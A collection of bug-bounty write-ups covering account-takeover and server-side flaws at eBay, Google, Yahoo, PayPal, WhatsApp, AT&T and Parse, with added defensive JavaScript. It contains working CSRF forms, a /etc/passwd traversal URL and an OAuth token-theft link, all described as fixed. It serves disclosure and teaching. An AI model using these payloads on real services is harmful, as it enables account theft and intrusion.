Featured

eBay: From CSRF to Full Account Takeover of Any User

After the eBay data breach I started looking for the bug that may have been exploited by attackers to steal the credentials of more than 100 million eBay user accounts, so I focused my attention on the eBay account-recovery procedures. If you are an eBay user you can reset the password of your account through three procedures:

1) Email address: an email with a reset link is sent to the registered email address

2) SMS: an SMS with a 4-digit PIN is sent by eBay to the registered phone number

3) Phone call: eBay makes a phone call to reset the password of the user’s account

The bug I found is in the SMS procedure. This CSRF bug allowed me to set a new phone number in the victim’s account; I could then use the SMS procedure to receive the PIN and reset the password of the victim’s eBay account. To set a new phone number in our eBay account we have to:

1) Go to https://scgi.ebay.it/ws/eBayISAPI.dll?ChangeRegistrationShow

2) Fill in all the form fields with the desired values

3) Click on the button to save the changes

(Screenshot taken 2014-06-04 12:27:19)

Once the button is clicked, a POST request like the following is generated:

POST   https://scgi.ebay.it/ws/eBayISAPI.dll

Host: scgi.ebay.it
User-Agent: myuseragent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://scgi.ebay.it/ws/eBayISAPI.dll?ChangeRegistrationPreview
Cookie: mycookies
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 758

MfcISAPICommand=ChangeRegistration&userid=&pass=&mid=&hmid=&firstname=Andrea&lastname=Santese&middleinitial=&nameAlt=&nameAlt2=&name=Andrea++Santese&company=&address=via+A.AAAAA&city=Maglie&state=LE&fullnameAlt=&companyAlt=&addressAlt=11&cityAlt=&stateAlt=&zip=73024&country=Italia&countryid=101&dayphone=++32709869473270986947+&nightphone=+++&faxphone=&dayphone1=3270986948&dayphone2=&dayphone3=&dayphone4=&nightphone1=&nightphone2=&nightphone3=&nightphone4=&gender=Non+specificato&billingcurrency=7&personalId=&personalIdType=&bizTypeCode=&bizNumber1=&bizNumber2=&taxIdNumber=&accountOperatorName=&srt=01000100000040018e9fb8c3652034dfa260bc532183a8ddb8b0625bb39c554c5798fd1ae45a250dfdbd26d445eda420b25052c714e49cabe4a038ceee0436e85ec32fb6903c4f&salutation=

The first time I looked at this POST request I noticed the “srt” parameter and thought it was an anti-CSRF token, but after a few attempts I noticed that the “srt” parameter and its value are not checked by the server, so they can be omitted. So I built an HTML page that, once opened by the victim, sets a new phone number (the attacker’s phone number) in the victim’s account.

This is the PoC:

<html>
<!-- auto-submit on load, so that simply opening the page sends the forged POST -->
<body onload="document.forms['form0'].submit()">
<!-- note: the "srt" field is deliberately omitted, since the server does not check it -->
<form method="POST" name="form0" action="https://scgi.ebay.it:443/ws/eBayISAPI.dll">
<input type="hidden" name="MfcISAPICommand" value="ChangeRegistration"/>
<input type="hidden" name="userid" value=""/>
<input type="hidden" name="pass" value=""/>
<input type="hidden" name="mid" value=""/>
<input type="hidden" name="hmid" value=""/>
<input type="hidden" name="firstname" value="firstname"/>
<input type="hidden" name="lastname" value="lastname"/>
<input type="hidden" name="middleinitial" value=""/>
<input type="hidden" name="nameAlt" value=""/>
<input type="hidden" name="nameAlt2" value=""/>
<input type="hidden" name="name" value="firstname lastname"/>
<input type="hidden" name="company" value=""/>
<input type="hidden" name="address" value="via A.AAAAA"/>
<input type="hidden" name="city" value="city"/>
<input type="hidden" name="state" value="state"/>
<input type="hidden" name="fullnameAlt" value=""/>
<input type="hidden" name="companyAlt" value=""/>
<input type="hidden" name="addressAlt" value="11"/>
<input type="hidden" name="cityAlt" value=""/>
<input type="hidden" name="stateAlt" value=""/>
<input type="hidden" name="zip" value="zipcode"/>
<input type="hidden" name="country" value="Italia"/>
<input type="hidden" name="countryid" value="101"/>
<!-- dayphone / dayphone1 carry the attacker's phone number -->
<input type="hidden" name="dayphone" value="  dayphone"/>
<input type="hidden" name="nightphone" value=""/>
<input type="hidden" name="faxphone" value=""/>
<input type="hidden" name="dayphone1" value="dayphone1"/>
<input type="hidden" name="dayphone2" value=""/>
<input type="hidden" name="dayphone3" value=""/>
<input type="hidden" name="dayphone4" value=""/>
<input type="hidden" name="nightphone1" value=""/>
<input type="hidden" name="nightphone2" value=""/>
<input type="hidden" name="nightphone3" value=""/>
<input type="hidden" name="nightphone4" value=""/>
<input type="hidden" name="gender" value="Non specificato"/>
<input type="hidden" name="billingcurrency" value="7"/>
<input type="hidden" name="personalId" value=""/>
<input type="hidden" name="personalIdType" value=""/>
<input type="hidden" name="bizTypeCode" value=""/>
<input type="hidden" name="bizNumber1" value=""/>
<input type="hidden" name="bizNumber2" value=""/>
<input type="hidden" name="taxIdNumber" value=""/>
<input type="hidden" name="accountOperatorName" value=""/>
<input type="hidden" name="salutation" value=""/>
</form>
</body>
</html>

Once the victim has opened this HTML page, the new phone number is set in the victim’s account and the attacker can then reset the password of the victim’s account through the SMS procedure.

This is the Video PoC:

The bug has now been fixed.

Google: From Privilege Escalation Vulnerability to Full Account Takeover

In this write-up I’ll explain how I was able to reset the password of, and gain full access to, any Google account that did not have a security question set.

This is the bug report I sent to the Google Security Team.

I’ve found a huge bug in Gmail. I’ve found a way to gain full access to a Gmail account with no victim interaction. This bug can be exploited if the victim hasn’t set the security question.
These are the steps to reproduce the issue:
1) Go to https://www.google.com/accounts/recovery/?hl=en and click on “I don’t know my password”. Now in the “Email address” form we have to insert the victim’s Gmail address and then click on the “Continue” button.
2) Now in the new page, in “Enter the last password you remember”, we have to insert a random password (in my case I used 1122334455) and then click on the “Continue” button.
3) Now in the new page you can see this message: “Can’t access any of these recovery options? Verify your identity by answering multiple questions about your account.” So click on the “Verify your identity” link.
4) Now in the “Enter an email address where we can contact you if necessary (Required)” form we have to insert the attacker’s Gmail address, and in “Re-enter email address (Required)” we have to insert the attacker’s Gmail address again, then click on the “Continue” button.
5) Now in the “Last password you remember (Required)” form we have to insert a random password (in my case I used 1122334455). In “When was the last time you were able to sign in to your Google Account? (Required)” we have to choose a random date (in my case I chose ‘March 1 1991’). In “When did you create your Google Account? (Required)” we have to choose a random date (in my case I chose ‘March 1991’). Now click on the “Continue” button.
6) Now in the new page click on the “Skip these questions” button without answering the questions.
7) Now in the new page click on the “Submit” button.
When we click on the “Submit” button an email is sent to the attacker’s Gmail address with the link to reset the password of the victim’s Gmail account. Now the attacker has full access to the victim’s profile. With this bug I can reset the Gmail password of all users who have not set a security question.

The bug has now been fixed. This is the Video PoC:

Yahoo! SSRF/XSPA Vulnerability

Before describing how I found this bug, I’d like to introduce the SSRF/XSPA vulnerability.

An application is vulnerable to Cross Site Port Attacks if it processes user-supplied URLs and does not verify/sanitize the backend response received from remote servers before sending it back to the client. An attacker can send crafted queries to a vulnerable web application to proxy attacks to external Internet-facing servers, intranet devices and the web server itself, using the advertised functionality of the vulnerable web application. The responses, in certain cases, can be studied to identify service availability (port status, banners etc.) and even to fetch data from remote services in unconventional ways. XSPA allows attackers to target the server infrastructure: mostly the intranet of the web server, the web server itself and any public Internet-facing server as well. This vulnerability can be used for:

1) Port scanning remote Internet-facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.
2) Exploiting vulnerable programs running on the intranet or on the local web server
3) Fingerprinting intranet web applications using standard application default files and behaviour
4) Attacking internal/external web applications that are vulnerable to GET-parameter-based vulnerabilities (SQLi via URL, parameter manipulation etc.)
5) Reading local web server files using the file:/// protocol handler

In this blog post I describe how I used a Yahoo! server to port-scan a remote host and see whether a port is in the open, filtered or closed state. This is the bug report I sent to Yahoo! Security.

I’ve found an SSRF in http://add.yahoo.com
These are the steps to reproduce the issue:
1) Go to http://dir.yahoo.com/recreation/games/video_games/titles/action/
2) Now click on the “Suggest a Site” button and then click on “Standard Consideration”
3) Now click on the “Continue” button
Now in this page we have to fill in 4 forms. In “Site Title” I inserted ‘asdf’ as the value.
Now in the “Security Email ID” and “Contact Person” forms we have to insert values of our choice.
Now in the “URL” form we have to insert the target site to see whether a certain port is in the filtered, open or closed state.
Let’s suppose that port 20 of www.targeturl.com is closed, so in the “URL” form we have to insert “http://www.targeturl.com:20”.
Now that we have filled in all the form values we have to click on the “Submit” button. We will receive an error like this: “The following resulted when trying to access your document:

connect: Connection refused”, telling us that the port is closed.
Let’s suppose that port 23 of www.targeturl.com is filtered, so in the “URL” form we have to insert “http://www.targeturl.com:23”.
If the port is filtered we will receive the following message: “The following resulted when trying to access your document:

Request Timeout”
Let’s suppose that port 21 of www.targeturl.com is open, so in the “URL” form we have to insert “http://www.targeturl.com:21”.
If the port is open we will receive the following message: “Document contains no data”. Based on these three responses we can tell whether a port of a remote host is open, filtered or closed.

The bug has now been fixed. To write this blog post I referred to this article, which in my opinion is one of the best tutorials on the SSRF/XSPA vulnerability.

This is the Video PoC:
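The following is an added example, not Yahoo!’s code and not part of the original report, covering both the XSPA description and the port-scan procedure above. It shows the two sides of the issue: classifyPortState() maps the three error strings the “Suggest a Site” form returned to a port state (that mapping is what turns the form into a scanner), and isSafeFetchTarget() is the server-side check that would have prevented it, since a URL-submission feature only needs to reach public hosts on web ports. The allowed-port list, the private-range table and the sample responses are assumptions constructed for this example.

```javascript
// Added example (not Yahoo!'s code), covering the XSPA description and the
// port-scan procedure above.
//  - classifyPortState() maps the three error strings the "Suggest a Site" form
//    returned to a port state; that mapping is what turns the form into a scanner.
//  - isSafeFetchTarget() is the server-side check that would have prevented it.
// The allowed-port list, the private-range table and the sample responses are
// assumptions constructed for this example.

// Error texts quoted in the write-up, keyed by the port state they reveal.
const SIGNATURES = [
  { state: "closed",   needle: "Connection refused" },
  { state: "filtered", needle: "Request Timeout" },
  { state: "open",     needle: "Document contains no data" },
];

function classifyPortState(responseText) {
  const hit = SIGNATURES.find(({ needle }) => responseText.includes(needle));
  return hit ? hit.state : "unknown";
}

// Ports a "submit your site" feature legitimately needs; anything explicit
// beyond these (e.g. :20, :21, :23) is a scan, not a web page.
const ALLOWED_PORTS = new Set(["", "80", "443"]);

const IPV4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

// "This network", loopback, RFC 1918 and link-local ranges.
function isPrivateIPv4(ip) {
  const m = IPV4.exec(ip);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254);
}

function isSafeFetchTarget(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return false; }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false; // no file:, gopher:, ...
  if (!ALLOWED_PORTS.has(url.port)) return false;
  const host = url.hostname.replace(/^\[|\]$/g, "");   // "[::1]" -> "::1"
  if (host === "localhost" || host.endsWith(".localhost")) return false;
  if (host.includes(":")) return false;                // IPv6 literal: reject outright
  if (isPrivateIPv4(host)) return false;
  return true;
}

// Constructed responses, modelled on the three messages quoted above.
const sampleResponses = {
  "http://www.targeturl.com:20": "The following resulted when trying to access your document:\n\nconnect: Connection refused",
  "http://www.targeturl.com:23": "The following resulted when trying to access your document:\n\nRequest Timeout",
  "http://www.targeturl.com:21": "Document contains no data",
};

// Turn (target URL -> response text) pairs into a port -> state map, which is
// what an attacker would script against the vulnerable form.
function scanFromResponses(responses) {
  const result = {};
  for (const [target, text] of Object.entries(responses)) {
    result[new URL(target).port] = classifyPortState(text);
  }
  return result;
}
```

Two caveats for the defensive half: a hostname that resolves to a private address is not caught by a literal check, so the real fetcher must resolve the name and re-check the address it is about to connect to (and pin it, to defeat DNS rebinding); and the WHATWG URL parser used by Node normalises shorthand literals such as 127.1 or 0x7f000001 to 127.0.0.1 before isPrivateIPv4 sees them, which is the behaviour you want.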

Yahoo! Unrestricted File Upload Vulnerability

Hi all,

In this write-up I’ll explain how I found an unrestricted file upload in https://reports-as.web.analytics.yahoo.com/

This is the PoC I sent to Yahoo! Security.

These are the steps to reproduce the issue:
1) Log in at yahoo.com
2) Once logged in we have to go to https://reports-as.web.analytics.yahoo.com/Login.vm and then click on “Manage Scheduled Reports”
3) Now we have to click on the “Do you want to change your company logo that appears on HTML and PDF reports?” button. This section only allows the upload of images with the .gif, .jpg or .png extensions. I found a way to bypass this restriction by uploading a text file, a.txt, containing “Yahoo Server Unrestricted File Upload by Andrea Santese”, renamed to a.txt.jpg.
So we upload this file and then click on the “Upload” button. Once uploaded, a message like “Image file is uploaded successfully!” appears, so the file has been accepted. I noticed that the uploaded file is served at https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer
But when we go to this link an error like the following appears: “The image “https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer” cannot be displayed because it contains errors.”
This error is due to the “Content-Type: image/jpg” header that the Yahoo server sends to the client making a GET request to https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer, so we change it into “Content-Type: text/html”. We can do this with a proxy like Burp Suite, intercepting the response the Yahoo server sends to the client and modifying the Content-Type on the fly. So we configure our browser to use the Burp Suite proxy. Once configured, we make a GET request to https://reports-as.web.analytics.yahoo.com/servlet/template/LogoServer. Before deciding whether to click “Forward” or “Drop”, we right-click on the raw request and select “Do Intercept” -> “Response to this request”. Now we click on the “Forward” button and get a response like the following:

HTTP/1.1 200 OK
Date: Wed, 26 Mar 2014 10:32:01 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 26 Mar 2014 10:32:02 GMT
Expires: Wed, 26 Mar 2014 10:32:02 GMT
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Connection: close
Content-Type: image/jpg
Content-Length: 57

Yahoo Server Unrestricted File Upload by Andrea Santese

Now we change Content-Type: image/jpg into Content-Type: text/html and click on the “Forward” button.

Now the content of the a.txt.jpg file will come up!
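The following is an added example, not Yahoo!’s code and not part of the original report. It models the logo-upload check that only looked at the file extension (so a.txt.jpg passes), beside a check that also inspects the file’s leading bytes, plus the response headers that stop a browser from reinterpreting stored bytes as markup. Note that in the write-up the Content-Type was rewritten in the tester’s own proxy, which only affects that tester’s browser; the server itself kept sending image/jpg, and the point of the hardened version is that it never stores non-image bytes in the first place. Function names, the magic-number table and the sample files are assumptions constructed for this example.

```javascript
// Added example (not Yahoo!'s code): extension-only upload check beside a
// content-aware one, and the headers to serve the stored file with.
// Function names, the magic-number table and the sample files are assumptions.

const ALLOWED_EXT = new Set(["gif", "jpg", "png"]);

// Leading bytes of the three permitted image formats.
const MAGIC = [
  { type: "image/jpeg", bytes: [0xff, 0xd8, 0xff] },
  { type: "image/png",  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "image/gif",  bytes: [0x47, 0x49, 0x46, 0x38] },   // "GIF8"
];

function extensionOf(filename) {
  const dot = filename.lastIndexOf(".");
  return dot === -1 ? "" : filename.slice(dot + 1).toLowerCase();
}

// Extension-only check: "a.txt.jpg" passes because only the last suffix is seen.
function acceptByExtension(filename) {
  return ALLOWED_EXT.has(extensionOf(filename));
}

// Returns the image type whose signature the buffer starts with, else null.
function sniffImageType(buf) {
  for (const { type, bytes } of MAGIC) {
    if (buf.length >= bytes.length && bytes.every((b, i) => buf[i] === b)) return type;
  }
  return null;
}

// Hardened check: extension must be allowed AND the content must carry the
// signature of an allowed format. The sniffed type, not the extension, is what
// gets stored and later served.
function acceptImageUpload(filename, buf) {
  if (!acceptByExtension(filename)) return { ok: false, reason: "extension" };
  const type = sniffImageType(buf);
  if (type === null) return { ok: false, reason: "not an image" };
  return { ok: true, type };
}

// Serving side: pin the stored type and forbid MIME sniffing, so that even a
// file that slipped through cannot be rendered as HTML by a guessing browser.
function logoResponseHeaders(storedType) {
  return {
    "Content-Type": storedType,
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
  };
}

// Constructed samples: the text file from the write-up renamed to .jpg, and a
// buffer that starts with a genuine PNG signature.
const textAsJpg = {
  name: "a.txt.jpg",
  data: Buffer.from("Yahoo Server Unrestricted File Upload by Andrea Santese"),
};
const pngLogo = {
  name: "logo.png",
  data: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]),
};
```

Signature checks are a necessary floor, not a ceiling: a file can start with valid image bytes and still carry a script payload for some other parser, so the stored file should additionally be re-encoded through an image library and served from a separate origin from the application itself.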

PayPal Merchant Launch Site: Authentication Bypass Vulnerability

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method provides adequate security. Negligence, ignorance or simple underestimation of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessible only after authentication has been performed. In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished by modifying a URL parameter, by manipulating the form, or by counterfeiting sessions.

In this write-up I’ll describe how I got into BillMeLater’s Merchant Launch Site as Administrator by exploiting an authentication bypass vulnerability, and what this bug allowed me to do once logged in.

Steps required to reproduce the issue:

After some DNS brute-forcing I found this BillMeLater subdomain:

https://launch.billmelater.com

(Photo 1)

Once I clicked on “Login” I was redirected to https://launch.billmelater.com/Home/tabid/36/ctl/Login/Default.aspx?returnurl=/default.aspx
so I started playing with this URL, deleting “?returnurl=/default.aspx” from it.
So this is the new URL:

https://launch.billmelater.com/Home/tabid/36/ctl/Login/Default.aspx

My attention was drawn to the “Login” directory, so I started to fuzz the URL manually, changing “Login” to “Register”:

https://launch.billmelater.com/Home/tabid/36/ctl/Register/Default.aspx

Once I submitted the request I received a 302 status code, so the link is accessible only when logged in.

(Photo 2)

So I decided to use a Mozilla Firefox add-on called “NoRedirect” so that I would not be redirected to the login page.

(Photo 3)

Now if I go to https://launch.billmelater.com/Home/tabid/36/ctl/Register/Default.aspx I am logged in as Administrator and can perform operations as if I were the Administrator.

(Photo 4)

Now the bug has been fixed and here’s a video of the process of exploiting this vulnerability:
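The following is an added example, not BillMeLater’s or PayPal’s code and not part of the original write-up. The page reports two observations: the Register page answered 302 to an unauthenticated request, and once the redirect was ignored the page was usable as Administrator. One mechanism consistent with both (an assumption, since the root cause is not stated on the page) is the “execution after redirect” pattern, where the handler sets the redirect but keeps rendering the protected content; in ASP.NET this is what happens when Response.Redirect is called with endResponse set to false, or when the code after the redirect call is not short-circuited. The handler names, the session shape and the page content are assumptions constructed for this example.

```javascript
// Added example (not BillMeLater's/PayPal's code): a model of the behaviour
// described above, assuming an "execution after redirect" bug. Handler names,
// session shape and page content are assumptions for illustration.

const ADMIN_PAGE = "<h1>Register new merchant</h1><form>...</form>";
const LOGIN_URL = "/Home/tabid/36/ctl/Login/Default.aspx?returnurl=/default.aspx";

function isAuthenticated(req) {
  return Boolean(req.session && req.session.user);
}

// Vulnerable handler: decides to redirect but falls through and renders anyway,
// so the 302 response carries the privileged page in its body.
function registerHandlerVulnerable(req) {
  const res = { status: 200, headers: {}, body: "" };
  if (!isAuthenticated(req)) {
    res.status = 302;
    res.headers.Location = LOGIN_URL;
    // missing "return res;" here
  }
  res.body = ADMIN_PAGE;          // reached for anonymous users too
  return res;
}

// Fixed handler: the auth check terminates the request; nothing privileged is
// computed or emitted once the redirect has been decided.
function registerHandlerFixed(req) {
  if (!isAuthenticated(req)) {
    return { status: 302, headers: { Location: LOGIN_URL }, body: "" };
  }
  return { status: 200, headers: {}, body: ADMIN_PAGE };
}

// A client that behaves like the NoRedirect add-on: it does not follow
// Location and simply shows whatever body arrived with the 302.
function fetchIgnoringRedirect(handler, req) {
  const res = handler(req);
  return { status: res.status, shown: res.body };
}

// Constructed requests: an anonymous visitor and a logged-in administrator.
const anonymousReq = { session: null };
const adminReq = { session: { user: "admin" } };
```

The test for this class of bug is mechanical: request every authenticated URL without a session and inspect the body of any 3xx response, not just its status; a non-empty body is a finding. Since the browser hides that body by following the redirect, an intercepting proxy or a client with redirects disabled is needed to see it.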

WhatsApp: LFI Vulnerability

Before describing the issue I found on WhatsApp I want to introduce the LFI vulnerability.

A file inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as simple as outputting the contents of the file, but depending on the severity it can also lead to:

  • Code execution on the web server
  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
  • Denial of Service (DoS)
  • Sensitive Information Disclosure

Local File Inclusion (also known as LFI) is the process of including files that are already present locally on the server, by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path of the file to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

The vulnerable link that allowed me to download the /etc/passwd file is:

http://media.whatsapp.com/directory/..%252f..%252f..%252f..%252fetc%252fpasswd

and this is the content of the /etc/passwd file:

The bug has now been fixed.
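The following is an added example, not WhatsApp’s code and not part of the original write-up. It shows why the payload above is double-encoded (%252f rather than %2f): a front end that decodes the URL once sees “..%2f”, which passes a naive “../” filter, while a back end that decodes again (or hands the value to a library that does) ends up with “../” and the OS resolves the traversal. Beside the naive resolver is one that decodes to a fixed point first and then refuses any segment that would climb above the base directory. The base directory and the helper names are assumptions constructed for this example.

```javascript
// Added example (not WhatsApp's code): double-decoding traversal beside a
// resolver that does not fall for it. Base directory and names are assumptions.

const BASE = "/var/www/media/directory";
const PAYLOAD = "..%252f..%252f..%252f..%252fetc%252fpasswd"; // from the write-up

// Decode repeatedly until the value stops changing (bounded), keeping every
// intermediate form so the double encoding is visible.
function decodeStages(s, max = 5) {
  const stages = [s];
  for (let i = 0; i < max; i++) {
    let next;
    try { next = decodeURIComponent(stages[stages.length - 1]); } catch { break; }
    if (next === stages[stages.length - 1]) break;
    stages.push(next);
  }
  return stages;
}

// What the OS opens for an absolute path containing "." and ".." segments
// (".." above "/" stays at "/").
function osResolve(absPath) {
  const out = [];
  for (const seg of absPath.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  return "/" + out.join("/");
}

// Naive: a second decode plus string concatenation; the ".." survive and the
// OS resolves them when the file is opened.
function resolveNaive(base, userPath) {
  return base + "/" + decodeURIComponent(decodeURIComponent(userPath));
}

// Safe: decode to a fixed point so no encoded form survives, reject NUL bytes,
// then walk the segments and refuse any ".." that would climb above the base.
// The returned path never leaves base; null means "refuse the request".
function resolveSafe(base, userPath) {
  const stages = decodeStages(userPath);
  const decoded = stages[stages.length - 1];
  if (decoded.includes("\0")) return null;
  const out = [];
  for (const seg of decoded.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (out.length === 0) return null;   // would escape the base directory
      out.pop();
      continue;
    }
    out.push(seg);
  }
  return base.replace(/\/+$/, "") + "/" + out.join("/");
}
```

The check is on the decoded, normalised result rather than on the raw input, which is what defeats encoding tricks (%2e%2e, %252f, mixed case); on a server that also accepts backslashes as separators, split on both before walking the segments.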

AT&T: From CSRF to Full Account Takeover of Any User

This is the PoC I sent to AT&T.

I’ve found a CSRF bug that may lead to full account takeover of an AT&T M2X user account.
These are the steps to reproduce the issue:
1) Log in at https://m2x.att.com/login
2) Once logged in we have to go to https://m2x.att.com/account
In this page we can see the “First Name”, “Last Name” and “Email” forms. If we change the values of these forms and then click
on the “Save Changes” button, a POST request like this is generated, with no anti-CSRF token:

POST https://m2x.att.com/account

Host: m2x.att.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://m2x.att.com/account
Cookie: mycookies
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

first_name=marco1&last_name=cariddi&email=sangunazzu@gmail.com&current_password=&password=&password_confirmation=

There is no anti-CSRF token, so the request is vulnerable to CSRF. So now I can create an ad-hoc HTML page like the following to set the value of the
“email” parameter to the attacker’s email. Once the victim has visited the HTML page, the attacker’s email is saved in the
victim’s account and the attacker can then request a password reset at https://m2x.att.com/forgot-password.
So an email is sent to the attacker’s address and the attacker can reset the password of the victim’s account.

This is the final CSRF PoC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>How I Hacked AT&T</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1824" );

function pausecomp(millis)
{
var date = new Date();
var curDate = null;

do { curDate = new Date(); }
while(curDate-date < millis);
}

function fireForms()
{
var count = 1;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();

pausecomp(pauses[i]);
}
}

</script>
<H2>How I Hacked AT&T</H2>
<form method="POST" name="form0" action="https://m2x.att.com:443/account">
<input type="hidden" name="first_name" value="marco1"/>
<input type="hidden" name="last_name" value="cariddi"/>
<input type="hidden" name="email" value="sangunazzu@gmail.com"/>
<input type="hidden" name="current_password" value=""/>
<input type="hidden" name="password" value=""/>
<input type="hidden" name="password_confirmation" value=""/>
</form>

</body>
</html>

Facebook’s Parse OAuth2 Bug

In this post I’m going to show how I was able to hack into Parse accounts via an OAuth vulnerability.
You can sign in to Parse by entering your email and password or by signing in with your Facebook account.

If we click on the “Log in with Facebook” button, a GET request is generated to this URL:

https://www.facebook.com/dialog/oauth?response_type=code&client_id=506576959379594&redirect_uri=https%3A%2F%2Fwww.parse.com%2Fauth%2Ffacebook%2Fcallback&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email

The parameters that we have to consider are:

  • response_type
  • client_id 
  • redirect_uri 
  • scope 

So I started to craft a forged URL that redirects the victim to a malicious site which saves the Parse token to a file. To do this, I started playing with the redirect_uri parameter to see whether it allowed subdomains or subfolders, and this was the result.

Allowed redirects:

  • xxx.parse.com (redirect to subdomains allowed)
  • xxx.parse.com/xxx/ (redirect to subfolders allowed)

I noticed that redirect_uri allowed subdomains and subfolders, so I looked for an open redirect vulnerability in Parse’s domain and subdomains, but I couldn’t find any.

I realized that the Parse subdomain files.parse.com allowed me to upload an HTML file, so I uploaded one containing HTML code that redirects to a malicious URL. The URL to view the uploaded page was:
http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html

Final PoC (Facebook has already fixed this issue):

https://www.facebook.com/dialog/oauth?response_type=token&client_id=506576959379594&redirect_uri=http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email

This URL will redirect the user to the site which has a script that takes the token and will save it in a file.
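The following is an added example, not Facebook’s or Parse’s code and not part of the original post. It models the redirect_uri decision: looseRedirectAllowed() reproduces what the post observed (any subdomain of the registered host and any sub-path are accepted, which is what let an attacker-controlled page on files.parse.com receive the token), and strictRedirectAllowed() is the exact-match rule from RFC 6749 that blocks it. tokenFromFragment() shows why the final PoC switched response_type=code to response_type=token: the implicit flow delivers the access token in the URL fragment, readable by whatever page sits at redirect_uri. The helper names and the loose-matching logic are assumptions constructed for this example, not a claim about how Facebook’s check was written.

```javascript
// Added example (not Facebook's or Parse's code): loose vs strict redirect_uri
// matching, and fragment token extraction. Helper names are assumptions.

const REGISTERED = "https://www.parse.com/auth/facebook/callback";
const ATTACKER_URI = "http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html";

// Loose (models the observed behaviour): same registrable domain or any
// subdomain of it; scheme, port and path are never compared.
function looseRedirectAllowed(registered, candidate) {
  let reg, cand;
  try { reg = new URL(registered); cand = new URL(candidate); } catch { return false; }
  const base = reg.hostname.replace(/^www\./, "");
  return cand.hostname === base || cand.hostname.endsWith("." + base);
}

// Strict: the candidate must equal one pre-registered URI component by
// component (scheme, host:port, path, query) and must carry no fragment.
function strictRedirectAllowed(registeredList, candidate) {
  let cand;
  try { cand = new URL(candidate); } catch { return false; }
  if (cand.hash !== "") return false;
  return registeredList.some((r) => {
    const reg = new URL(r);
    return reg.protocol === cand.protocol &&
      reg.host === cand.host &&
      reg.pathname === cand.pathname &&
      reg.search === cand.search;
  });
}

// What the attacker's page at redirect_uri does with an implicit-flow
// response: the token never reaches a server log, only the fragment.
function tokenFromFragment(landingUrl) {
  const fragment = new URL(landingUrl).hash.replace(/^#/, "");
  return new URLSearchParams(fragment).get("access_token");
}
```

Note that the strict rule must be applied to the full URI, not just the host: a path-level match such as a prefix comparison reopens the hole via the open-redirect or file-hosting endpoints on the same host, which is exactly the route the post describes. Recognisable alternative that is still safe: registering several exact URIs rather than one pattern.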